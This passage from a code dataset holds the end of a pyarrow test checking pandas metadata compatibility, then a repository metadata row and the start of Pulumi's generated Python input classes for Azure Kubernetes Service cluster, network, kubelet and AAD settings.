t5 = t5.replace_schema_metadata({
b'pandas': json.dumps(
{'index_columns': [gen_name_0, gen_name_1],
'column_indexes': [{'name': None,
'field_name': None,
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': {'encoding': 'UTF-8'}}],
'columns': [{'name': 'a',
'field_name': 'a',
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': None},
{'name': None,
'field_name': gen_name_0,
'pandas_type': 'int64',
'numpy_type': 'int64',
'metadata': None},
{'name': None,
'field_name': gen_name_1,
'pandas_type': 'unicode',
'numpy_type': 'object',
'metadata': None}],
'pandas_version': '0.23.4'}
)})
r5 = t5.to_pandas()
tm.assert_frame_equal(r5, e5)
def test_metadata_compat_missing_field_name():
# Combination of missing field name but with index column as metadata.
# This combo occurs in the latest versions of fastparquet (0.3.2), but not
# in pyarrow itself (since field_name was added in 0.8, index as metadata
# only added later)
a_values = [1, 2, 3, 4]
b_values = [u'a', u'b', u'c', u'd']
a_arrow = pa.array(a_values, type='int64')
b_arrow = pa.array(b_values, type='utf8')
expected = pd.DataFrame({
'a': a_values,
'b': b_values,
}, index=pd.RangeIndex(0, 8, step=2, name='qux'))
table = pa.table({'a': a_arrow, 'b': b_arrow})
# metadata generated by fastparquet 0.3.2 with missing field_names
table = table.replace_schema_metadata({
b'pandas': json.dumps(
{'column_indexes': [
{'field_name': None,
'metadata': None,
'name': None,
'numpy_type': 'object',
'pandas_type': 'mixed-integer'}
],
'columns': [
{'metadata': None,
'name': 'a',
'numpy_type': 'int64',
'pandas_type': 'int64'},
{'metadata': None,
'name': 'b',
'numpy_type': 'object',
'pandas_type': 'unicode'}
],
'index_columns': [
{'kind': 'range',
'name': 'qux',
'start': 0,
'step': 2,
'stop': 8}
],
'pandas_version': '0.25.0'}
)})
result = table.to_pandas()
# on python 3.5 the column order can differ -> adding check_like=True
tm.assert_frame_equal(result, expected, check_like=True)
| 35.564169
| 79
| 0.561048
|
4a07c8a001592b32331e309880d98d36f88abe8c
| 155,686
|
py
|
Python
|
sdk/python/pulumi_azure_native/containerservice/_inputs.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/containerservice/_inputs.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/containerservice/_inputs.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from ._enums import *
__all__ = [
'AgentPoolUpgradeSettingsArgs',
'ContainerServiceLinuxProfileArgs',
'ContainerServiceNetworkProfileArgs',
'ContainerServiceSshConfigurationArgs',
'ContainerServiceSshPublicKeyArgs',
'CreationDataArgs',
'ExtendedLocationArgs',
'KubeletConfigArgs',
'LinuxOSConfigArgs',
'ManagedClusterAADProfileArgs',
'ManagedClusterAPIServerAccessProfileArgs',
'ManagedClusterAddonProfileArgs',
'ManagedClusterAgentPoolProfileArgs',
'ManagedClusterAutoUpgradeProfileArgs',
'ManagedClusterHTTPProxyConfigArgs',
'ManagedClusterIdentityArgs',
'ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs',
'ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs',
'ManagedClusterLoadBalancerProfileOutboundIPsArgs',
'ManagedClusterLoadBalancerProfileArgs',
'ManagedClusterPodIdentityExceptionArgs',
'ManagedClusterPodIdentityProfileArgs',
'ManagedClusterPodIdentityArgs',
'ManagedClusterPropertiesAutoScalerProfileArgs',
'ManagedClusterPropertiesIdentityProfileArgs',
'ManagedClusterSKUArgs',
'ManagedClusterServicePrincipalProfileArgs',
'ManagedClusterWindowsProfileArgs',
'NetworkProfileArgs',
'OpenShiftManagedClusterAADIdentityProviderArgs',
'OpenShiftManagedClusterAgentPoolProfileArgs',
'OpenShiftManagedClusterAuthProfileArgs',
'OpenShiftManagedClusterIdentityProviderArgs',
'OpenShiftManagedClusterMasterPoolProfileArgs',
'OpenShiftRouterProfileArgs',
'PrivateEndpointArgs',
'PrivateLinkResourceArgs',
'PrivateLinkServiceConnectionStateArgs',
'PurchasePlanArgs',
'ResourceReferenceArgs',
'SysctlConfigArgs',
'TimeInWeekArgs',
'TimeSpanArgs',
'UserAssignedIdentityArgs',
]
@pulumi.input_type
class AgentPoolUpgradeSettingsArgs:
def __init__(__self__, *,
max_surge: Optional[pulumi.Input[str]] = None):
"""
Settings for upgrading an agentpool
:param pulumi.Input[str] max_surge: Count or percentage of additional nodes to be added during upgrade. If empty uses AKS default
"""
if max_surge is not None:
pulumi.set(__self__, "max_surge", max_surge)
@property
@pulumi.getter(name="maxSurge")
def max_surge(self) -> Optional[pulumi.Input[str]]:
"""
Count or percentage of additional nodes to be added during upgrade. If empty uses AKS default
"""
return pulumi.get(self, "max_surge")
@max_surge.setter
def max_surge(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_surge", value)
@pulumi.input_type
class ContainerServiceLinuxProfileArgs:
def __init__(__self__, *,
admin_username: pulumi.Input[str],
ssh: pulumi.Input['ContainerServiceSshConfigurationArgs']):
"""
Profile for Linux VMs in the container service cluster.
:param pulumi.Input[str] admin_username: The administrator username to use for Linux VMs.
:param pulumi.Input['ContainerServiceSshConfigurationArgs'] ssh: SSH configuration for Linux-based VMs running on Azure.
"""
pulumi.set(__self__, "admin_username", admin_username)
pulumi.set(__self__, "ssh", ssh)
@property
@pulumi.getter(name="adminUsername")
def admin_username(self) -> pulumi.Input[str]:
"""
The administrator username to use for Linux VMs.
"""
return pulumi.get(self, "admin_username")
@admin_username.setter
def admin_username(self, value: pulumi.Input[str]):
pulumi.set(self, "admin_username", value)
@property
@pulumi.getter
def ssh(self) -> pulumi.Input['ContainerServiceSshConfigurationArgs']:
"""
SSH configuration for Linux-based VMs running on Azure.
"""
return pulumi.get(self, "ssh")
@ssh.setter
def ssh(self, value: pulumi.Input['ContainerServiceSshConfigurationArgs']):
pulumi.set(self, "ssh", value)
@pulumi.input_type
class ContainerServiceNetworkProfileArgs:
def __init__(__self__, *,
dns_service_ip: Optional[pulumi.Input[str]] = None,
docker_bridge_cidr: Optional[pulumi.Input[str]] = None,
load_balancer_profile: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileArgs']] = None,
load_balancer_sku: Optional[pulumi.Input[Union[str, 'LoadBalancerSku']]] = None,
network_mode: Optional[pulumi.Input[Union[str, 'NetworkMode']]] = None,
network_plugin: Optional[pulumi.Input[Union[str, 'NetworkPlugin']]] = None,
network_policy: Optional[pulumi.Input[Union[str, 'NetworkPolicy']]] = None,
outbound_type: Optional[pulumi.Input[Union[str, 'OutboundType']]] = None,
pod_cidr: Optional[pulumi.Input[str]] = None,
service_cidr: Optional[pulumi.Input[str]] = None):
"""
Profile of network configuration.
:param pulumi.Input[str] dns_service_ip: An IP address assigned to the Kubernetes DNS service. It must be within the Kubernetes service address range specified in serviceCidr.
:param pulumi.Input[str] docker_bridge_cidr: A CIDR notation IP range assigned to the Docker bridge network. It must not overlap with any Subnet IP ranges or the Kubernetes service address range.
:param pulumi.Input['ManagedClusterLoadBalancerProfileArgs'] load_balancer_profile: Profile of the cluster load balancer.
:param pulumi.Input[Union[str, 'LoadBalancerSku']] load_balancer_sku: The load balancer sku for the managed cluster.
:param pulumi.Input[Union[str, 'NetworkMode']] network_mode: Network mode used for building Kubernetes network.
:param pulumi.Input[Union[str, 'NetworkPlugin']] network_plugin: Network plugin used for building Kubernetes network.
:param pulumi.Input[Union[str, 'NetworkPolicy']] network_policy: Network policy used for building Kubernetes network.
:param pulumi.Input[Union[str, 'OutboundType']] outbound_type: The outbound (egress) routing method.
:param pulumi.Input[str] pod_cidr: A CIDR notation IP range from which to assign pod IPs when kubenet is used.
:param pulumi.Input[str] service_cidr: A CIDR notation IP range from which to assign service cluster IPs. It must not overlap with any Subnet IP ranges.
"""
if dns_service_ip is None:
dns_service_ip = '10.0.0.10'
if dns_service_ip is not None:
pulumi.set(__self__, "dns_service_ip", dns_service_ip)
if docker_bridge_cidr is None:
docker_bridge_cidr = '172.17.0.1/16'
if docker_bridge_cidr is not None:
pulumi.set(__self__, "docker_bridge_cidr", docker_bridge_cidr)
if load_balancer_profile is not None:
pulumi.set(__self__, "load_balancer_profile", load_balancer_profile)
if load_balancer_sku is not None:
pulumi.set(__self__, "load_balancer_sku", load_balancer_sku)
if network_mode is not None:
pulumi.set(__self__, "network_mode", network_mode)
if network_plugin is None:
network_plugin = 'kubenet'
if network_plugin is not None:
pulumi.set(__self__, "network_plugin", network_plugin)
if network_policy is not None:
pulumi.set(__self__, "network_policy", network_policy)
if outbound_type is None:
outbound_type = 'loadBalancer'
if outbound_type is not None:
pulumi.set(__self__, "outbound_type", outbound_type)
if pod_cidr is None:
pod_cidr = '10.244.0.0/16'
if pod_cidr is not None:
pulumi.set(__self__, "pod_cidr", pod_cidr)
if service_cidr is None:
service_cidr = '10.0.0.0/16'
if service_cidr is not None:
pulumi.set(__self__, "service_cidr", service_cidr)
@property
@pulumi.getter(name="dnsServiceIP")
def dns_service_ip(self) -> Optional[pulumi.Input[str]]:
"""
An IP address assigned to the Kubernetes DNS service. It must be within the Kubernetes service address range specified in serviceCidr.
"""
return pulumi.get(self, "dns_service_ip")
@dns_service_ip.setter
def dns_service_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dns_service_ip", value)
@property
@pulumi.getter(name="dockerBridgeCidr")
def docker_bridge_cidr(self) -> Optional[pulumi.Input[str]]:
"""
A CIDR notation IP range assigned to the Docker bridge network. It must not overlap with any Subnet IP ranges or the Kubernetes service address range.
"""
return pulumi.get(self, "docker_bridge_cidr")
@docker_bridge_cidr.setter
def docker_bridge_cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "docker_bridge_cidr", value)
@property
@pulumi.getter(name="loadBalancerProfile")
def load_balancer_profile(self) -> Optional[pulumi.Input['ManagedClusterLoadBalancerProfileArgs']]:
"""
Profile of the cluster load balancer.
"""
return pulumi.get(self, "load_balancer_profile")
@load_balancer_profile.setter
def load_balancer_profile(self, value: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileArgs']]):
pulumi.set(self, "load_balancer_profile", value)
@property
@pulumi.getter(name="loadBalancerSku")
def load_balancer_sku(self) -> Optional[pulumi.Input[Union[str, 'LoadBalancerSku']]]:
"""
The load balancer sku for the managed cluster.
"""
return pulumi.get(self, "load_balancer_sku")
@load_balancer_sku.setter
def load_balancer_sku(self, value: Optional[pulumi.Input[Union[str, 'LoadBalancerSku']]]):
pulumi.set(self, "load_balancer_sku", value)
@property
@pulumi.getter(name="networkMode")
def network_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkMode']]]:
"""
Network mode used for building Kubernetes network.
"""
return pulumi.get(self, "network_mode")
@network_mode.setter
def network_mode(self, value: Optional[pulumi.Input[Union[str, 'NetworkMode']]]):
pulumi.set(self, "network_mode", value)
@property
@pulumi.getter(name="networkPlugin")
def network_plugin(self) -> Optional[pulumi.Input[Union[str, 'NetworkPlugin']]]:
"""
Network plugin used for building Kubernetes network.
"""
return pulumi.get(self, "network_plugin")
@network_plugin.setter
def network_plugin(self, value: Optional[pulumi.Input[Union[str, 'NetworkPlugin']]]):
pulumi.set(self, "network_plugin", value)
@property
@pulumi.getter(name="networkPolicy")
def network_policy(self) -> Optional[pulumi.Input[Union[str, 'NetworkPolicy']]]:
"""
Network policy used for building Kubernetes network.
"""
return pulumi.get(self, "network_policy")
@network_policy.setter
def network_policy(self, value: Optional[pulumi.Input[Union[str, 'NetworkPolicy']]]):
pulumi.set(self, "network_policy", value)
@property
@pulumi.getter(name="outboundType")
def outbound_type(self) -> Optional[pulumi.Input[Union[str, 'OutboundType']]]:
"""
The outbound (egress) routing method.
"""
return pulumi.get(self, "outbound_type")
@outbound_type.setter
def outbound_type(self, value: Optional[pulumi.Input[Union[str, 'OutboundType']]]):
pulumi.set(self, "outbound_type", value)
@property
@pulumi.getter(name="podCidr")
def pod_cidr(self) -> Optional[pulumi.Input[str]]:
"""
A CIDR notation IP range from which to assign pod IPs when kubenet is used.
"""
return pulumi.get(self, "pod_cidr")
@pod_cidr.setter
def pod_cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pod_cidr", value)
@property
@pulumi.getter(name="serviceCidr")
def service_cidr(self) -> Optional[pulumi.Input[str]]:
"""
A CIDR notation IP range from which to assign service cluster IPs. It must not overlap with any Subnet IP ranges.
"""
return pulumi.get(self, "service_cidr")
@service_cidr.setter
def service_cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_cidr", value)
@pulumi.input_type
class ContainerServiceSshConfigurationArgs:
def __init__(__self__, *,
public_keys: pulumi.Input[Sequence[pulumi.Input['ContainerServiceSshPublicKeyArgs']]]):
"""
SSH configuration for Linux-based VMs running on Azure.
:param pulumi.Input[Sequence[pulumi.Input['ContainerServiceSshPublicKeyArgs']]] public_keys: The list of SSH public keys used to authenticate with Linux-based VMs. Only expect one key specified.
"""
pulumi.set(__self__, "public_keys", public_keys)
@property
@pulumi.getter(name="publicKeys")
def public_keys(self) -> pulumi.Input[Sequence[pulumi.Input['ContainerServiceSshPublicKeyArgs']]]:
"""
The list of SSH public keys used to authenticate with Linux-based VMs. Only expect one key specified.
"""
return pulumi.get(self, "public_keys")
@public_keys.setter
def public_keys(self, value: pulumi.Input[Sequence[pulumi.Input['ContainerServiceSshPublicKeyArgs']]]):
pulumi.set(self, "public_keys", value)
@pulumi.input_type
class ContainerServiceSshPublicKeyArgs:
def __init__(__self__, *,
key_data: pulumi.Input[str]):
"""
Contains information about SSH certificate public key data.
:param pulumi.Input[str] key_data: Certificate public key used to authenticate with VMs through SSH. The certificate must be in PEM format with or without headers.
"""
pulumi.set(__self__, "key_data", key_data)
@property
@pulumi.getter(name="keyData")
def key_data(self) -> pulumi.Input[str]:
"""
Certificate public key used to authenticate with VMs through SSH. The certificate must be in PEM format with or without headers.
"""
return pulumi.get(self, "key_data")
@key_data.setter
def key_data(self, value: pulumi.Input[str]):
pulumi.set(self, "key_data", value)
@pulumi.input_type
class CreationDataArgs:
def __init__(__self__, *,
source_resource_id: Optional[pulumi.Input[str]] = None):
"""
Data used when creating a target resource from a source resource.
:param pulumi.Input[str] source_resource_id: This is the ARM ID of the source object to be used to create the target object.
"""
if source_resource_id is not None:
pulumi.set(__self__, "source_resource_id", source_resource_id)
@property
@pulumi.getter(name="sourceResourceId")
def source_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
This is the ARM ID of the source object to be used to create the target object.
"""
return pulumi.get(self, "source_resource_id")
@source_resource_id.setter
def source_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_resource_id", value)
@pulumi.input_type
class ExtendedLocationArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[Union[str, 'ExtendedLocationTypes']]] = None):
"""
The complex type of the extended location.
:param pulumi.Input[str] name: The name of the extended location.
:param pulumi.Input[Union[str, 'ExtendedLocationTypes']] type: The type of the extended location.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the extended location.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[Union[str, 'ExtendedLocationTypes']]]:
"""
The type of the extended location.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[Union[str, 'ExtendedLocationTypes']]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class KubeletConfigArgs:
def __init__(__self__, *,
allowed_unsafe_sysctls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
container_log_max_files: Optional[pulumi.Input[int]] = None,
container_log_max_size_mb: Optional[pulumi.Input[int]] = None,
cpu_cfs_quota: Optional[pulumi.Input[bool]] = None,
cpu_cfs_quota_period: Optional[pulumi.Input[str]] = None,
cpu_manager_policy: Optional[pulumi.Input[str]] = None,
fail_swap_on: Optional[pulumi.Input[bool]] = None,
image_gc_high_threshold: Optional[pulumi.Input[int]] = None,
image_gc_low_threshold: Optional[pulumi.Input[int]] = None,
pod_max_pids: Optional[pulumi.Input[int]] = None,
topology_manager_policy: Optional[pulumi.Input[str]] = None):
"""
Kubelet configurations of agent nodes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_unsafe_sysctls: Allowlist of unsafe sysctls or unsafe sysctl patterns (ending in `*`).
:param pulumi.Input[int] container_log_max_files: The maximum number of container log files that can be present for a container. The number must be ≥ 2.
:param pulumi.Input[int] container_log_max_size_mb: The maximum size (e.g. 10Mi) of container log file before it is rotated.
:param pulumi.Input[bool] cpu_cfs_quota: Enable CPU CFS quota enforcement for containers that specify CPU limits.
:param pulumi.Input[str] cpu_cfs_quota_period: Sets CPU CFS quota period value.
:param pulumi.Input[str] cpu_manager_policy: CPU Manager policy to use.
:param pulumi.Input[bool] fail_swap_on: If set to true it will make the Kubelet fail to start if swap is enabled on the node.
:param pulumi.Input[int] image_gc_high_threshold: The percent of disk usage after which image garbage collection is always run.
:param pulumi.Input[int] image_gc_low_threshold: The percent of disk usage before which image garbage collection is never run.
:param pulumi.Input[int] pod_max_pids: The maximum number of processes per pod.
:param pulumi.Input[str] topology_manager_policy: Topology Manager policy to use.
"""
if allowed_unsafe_sysctls is not None:
pulumi.set(__self__, "allowed_unsafe_sysctls", allowed_unsafe_sysctls)
if container_log_max_files is not None:
pulumi.set(__self__, "container_log_max_files", container_log_max_files)
if container_log_max_size_mb is not None:
pulumi.set(__self__, "container_log_max_size_mb", container_log_max_size_mb)
if cpu_cfs_quota is not None:
pulumi.set(__self__, "cpu_cfs_quota", cpu_cfs_quota)
if cpu_cfs_quota_period is not None:
pulumi.set(__self__, "cpu_cfs_quota_period", cpu_cfs_quota_period)
if cpu_manager_policy is not None:
pulumi.set(__self__, "cpu_manager_policy", cpu_manager_policy)
if fail_swap_on is not None:
pulumi.set(__self__, "fail_swap_on", fail_swap_on)
if image_gc_high_threshold is not None:
pulumi.set(__self__, "image_gc_high_threshold", image_gc_high_threshold)
if image_gc_low_threshold is not None:
pulumi.set(__self__, "image_gc_low_threshold", image_gc_low_threshold)
if pod_max_pids is not None:
pulumi.set(__self__, "pod_max_pids", pod_max_pids)
if topology_manager_policy is not None:
pulumi.set(__self__, "topology_manager_policy", topology_manager_policy)
@property
@pulumi.getter(name="allowedUnsafeSysctls")
def allowed_unsafe_sysctls(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Allowlist of unsafe sysctls or unsafe sysctl patterns (ending in `*`).
"""
return pulumi.get(self, "allowed_unsafe_sysctls")
@allowed_unsafe_sysctls.setter
def allowed_unsafe_sysctls(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_unsafe_sysctls", value)
@property
@pulumi.getter(name="containerLogMaxFiles")
def container_log_max_files(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of container log files that can be present for a container. The number must be ≥ 2.
"""
return pulumi.get(self, "container_log_max_files")
@container_log_max_files.setter
def container_log_max_files(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "container_log_max_files", value)
@property
@pulumi.getter(name="containerLogMaxSizeMB")
def container_log_max_size_mb(self) -> Optional[pulumi.Input[int]]:
"""
The maximum size (e.g. 10Mi) of container log file before it is rotated.
"""
return pulumi.get(self, "container_log_max_size_mb")
@container_log_max_size_mb.setter
def container_log_max_size_mb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "container_log_max_size_mb", value)
@property
@pulumi.getter(name="cpuCfsQuota")
def cpu_cfs_quota(self) -> Optional[pulumi.Input[bool]]:
"""
Enable CPU CFS quota enforcement for containers that specify CPU limits.
"""
return pulumi.get(self, "cpu_cfs_quota")
@cpu_cfs_quota.setter
def cpu_cfs_quota(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "cpu_cfs_quota", value)
@property
@pulumi.getter(name="cpuCfsQuotaPeriod")
def cpu_cfs_quota_period(self) -> Optional[pulumi.Input[str]]:
"""
Sets CPU CFS quota period value.
"""
return pulumi.get(self, "cpu_cfs_quota_period")
@cpu_cfs_quota_period.setter
def cpu_cfs_quota_period(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cpu_cfs_quota_period", value)
@property
@pulumi.getter(name="cpuManagerPolicy")
def cpu_manager_policy(self) -> Optional[pulumi.Input[str]]:
"""
CPU Manager policy to use.
"""
return pulumi.get(self, "cpu_manager_policy")
@cpu_manager_policy.setter
def cpu_manager_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cpu_manager_policy", value)
@property
@pulumi.getter(name="failSwapOn")
def fail_swap_on(self) -> Optional[pulumi.Input[bool]]:
"""
If set to true it will make the Kubelet fail to start if swap is enabled on the node.
"""
return pulumi.get(self, "fail_swap_on")
@fail_swap_on.setter
def fail_swap_on(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "fail_swap_on", value)
@property
@pulumi.getter(name="imageGcHighThreshold")
def image_gc_high_threshold(self) -> Optional[pulumi.Input[int]]:
"""
The percent of disk usage after which image garbage collection is always run.
"""
return pulumi.get(self, "image_gc_high_threshold")
@image_gc_high_threshold.setter
def image_gc_high_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "image_gc_high_threshold", value)
@property
@pulumi.getter(name="imageGcLowThreshold")
def image_gc_low_threshold(self) -> Optional[pulumi.Input[int]]:
"""
The percent of disk usage before which image garbage collection is never run.
"""
return pulumi.get(self, "image_gc_low_threshold")
@image_gc_low_threshold.setter
def image_gc_low_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "image_gc_low_threshold", value)
@property
@pulumi.getter(name="podMaxPids")
def pod_max_pids(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of processes per pod.
"""
return pulumi.get(self, "pod_max_pids")
@pod_max_pids.setter
def pod_max_pids(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "pod_max_pids", value)
@property
@pulumi.getter(name="topologyManagerPolicy")
def topology_manager_policy(self) -> Optional[pulumi.Input[str]]:
"""
Topology Manager policy to use.
"""
return pulumi.get(self, "topology_manager_policy")
@topology_manager_policy.setter
def topology_manager_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "topology_manager_policy", value)
@pulumi.input_type
class LinuxOSConfigArgs:
def __init__(__self__, *,
swap_file_size_mb: Optional[pulumi.Input[int]] = None,
sysctls: Optional[pulumi.Input['SysctlConfigArgs']] = None,
transparent_huge_page_defrag: Optional[pulumi.Input[str]] = None,
transparent_huge_page_enabled: Optional[pulumi.Input[str]] = None):
"""
OS configurations of Linux agent nodes.
:param pulumi.Input[int] swap_file_size_mb: SwapFileSizeMB specifies size in MB of a swap file will be created on each node.
:param pulumi.Input['SysctlConfigArgs'] sysctls: Sysctl settings for Linux agent nodes.
:param pulumi.Input[str] transparent_huge_page_defrag: Transparent Huge Page defrag configuration.
:param pulumi.Input[str] transparent_huge_page_enabled: Transparent Huge Page enabled configuration.
"""
if swap_file_size_mb is not None:
pulumi.set(__self__, "swap_file_size_mb", swap_file_size_mb)
if sysctls is not None:
pulumi.set(__self__, "sysctls", sysctls)
if transparent_huge_page_defrag is not None:
pulumi.set(__self__, "transparent_huge_page_defrag", transparent_huge_page_defrag)
if transparent_huge_page_enabled is not None:
pulumi.set(__self__, "transparent_huge_page_enabled", transparent_huge_page_enabled)
@property
@pulumi.getter(name="swapFileSizeMB")
def swap_file_size_mb(self) -> Optional[pulumi.Input[int]]:
"""
SwapFileSizeMB specifies size in MB of a swap file will be created on each node.
"""
return pulumi.get(self, "swap_file_size_mb")
@swap_file_size_mb.setter
def swap_file_size_mb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "swap_file_size_mb", value)
@property
@pulumi.getter
def sysctls(self) -> Optional[pulumi.Input['SysctlConfigArgs']]:
"""
Sysctl settings for Linux agent nodes.
"""
return pulumi.get(self, "sysctls")
@sysctls.setter
def sysctls(self, value: Optional[pulumi.Input['SysctlConfigArgs']]):
pulumi.set(self, "sysctls", value)
@property
@pulumi.getter(name="transparentHugePageDefrag")
def transparent_huge_page_defrag(self) -> Optional[pulumi.Input[str]]:
"""
Transparent Huge Page defrag configuration.
"""
return pulumi.get(self, "transparent_huge_page_defrag")
@transparent_huge_page_defrag.setter
def transparent_huge_page_defrag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "transparent_huge_page_defrag", value)
@property
@pulumi.getter(name="transparentHugePageEnabled")
def transparent_huge_page_enabled(self) -> Optional[pulumi.Input[str]]:
"""
Transparent Huge Page enabled configuration.
"""
return pulumi.get(self, "transparent_huge_page_enabled")
@transparent_huge_page_enabled.setter
def transparent_huge_page_enabled(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "transparent_huge_page_enabled", value)
@pulumi.input_type
class ManagedClusterAADProfileArgs:
def __init__(__self__, *,
admin_group_object_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
client_app_id: Optional[pulumi.Input[str]] = None,
enable_azure_rbac: Optional[pulumi.Input[bool]] = None,
managed: Optional[pulumi.Input[bool]] = None,
server_app_id: Optional[pulumi.Input[str]] = None,
server_app_secret: Optional[pulumi.Input[str]] = None,
tenant_id: Optional[pulumi.Input[str]] = None):
"""
AADProfile specifies attributes for Azure Active Directory integration.
:param pulumi.Input[Sequence[pulumi.Input[str]]] admin_group_object_ids: AAD group object IDs that will have admin role of the cluster.
:param pulumi.Input[str] client_app_id: The client AAD application ID.
:param pulumi.Input[bool] enable_azure_rbac: Whether to enable Azure RBAC for Kubernetes authorization.
:param pulumi.Input[bool] managed: Whether to enable managed AAD.
:param pulumi.Input[str] server_app_id: The server AAD application ID.
:param pulumi.Input[str] server_app_secret: The server AAD application secret.
:param pulumi.Input[str] tenant_id: The AAD tenant ID to use for authentication. If not specified, will use the tenant of the deployment subscription.
"""
if admin_group_object_ids is not None:
pulumi.set(__self__, "admin_group_object_ids", admin_group_object_ids)
if client_app_id is not None:
pulumi.set(__self__, "client_app_id", client_app_id)
if enable_azure_rbac is not None:
pulumi.set(__self__, "enable_azure_rbac", enable_azure_rbac)
if managed is not None:
pulumi.set(__self__, "managed", managed)
if server_app_id is not None:
pulumi.set(__self__, "server_app_id", server_app_id)
if server_app_secret is not None:
pulumi.set(__self__, "server_app_secret", server_app_secret)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
@property
@pulumi.getter(name="adminGroupObjectIDs")
def admin_group_object_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
AAD group object IDs that will have admin role of the cluster.
"""
return pulumi.get(self, "admin_group_object_ids")
@admin_group_object_ids.setter
def admin_group_object_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "admin_group_object_ids", value)
@property
@pulumi.getter(name="clientAppID")
def client_app_id(self) -> Optional[pulumi.Input[str]]:
"""
The client AAD application ID.
"""
return pulumi.get(self, "client_app_id")
@client_app_id.setter
def client_app_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_app_id", value)
@property
@pulumi.getter(name="enableAzureRBAC")
def enable_azure_rbac(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable Azure RBAC for Kubernetes authorization.
"""
return pulumi.get(self, "enable_azure_rbac")
@enable_azure_rbac.setter
def enable_azure_rbac(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_azure_rbac", value)
@property
@pulumi.getter
def managed(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable managed AAD.
"""
return pulumi.get(self, "managed")
@managed.setter
def managed(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "managed", value)
@property
@pulumi.getter(name="serverAppID")
def server_app_id(self) -> Optional[pulumi.Input[str]]:
"""
The server AAD application ID.
"""
return pulumi.get(self, "server_app_id")
@server_app_id.setter
def server_app_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_app_id", value)
@property
@pulumi.getter(name="serverAppSecret")
def server_app_secret(self) -> Optional[pulumi.Input[str]]:
"""
The server AAD application secret.
"""
return pulumi.get(self, "server_app_secret")
@server_app_secret.setter
def server_app_secret(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_app_secret", value)
@property
@pulumi.getter(name="tenantID")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
The AAD tenant ID to use for authentication. If not specified, will use the tenant of the deployment subscription.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@pulumi.input_type
class ManagedClusterAPIServerAccessProfileArgs:
def __init__(__self__, *,
authorized_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_private_cluster: Optional[pulumi.Input[bool]] = None,
private_dns_zone: Optional[pulumi.Input[str]] = None):
"""
Access profile for managed cluster API server.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_ip_ranges: Authorized IP Ranges to kubernetes API server.
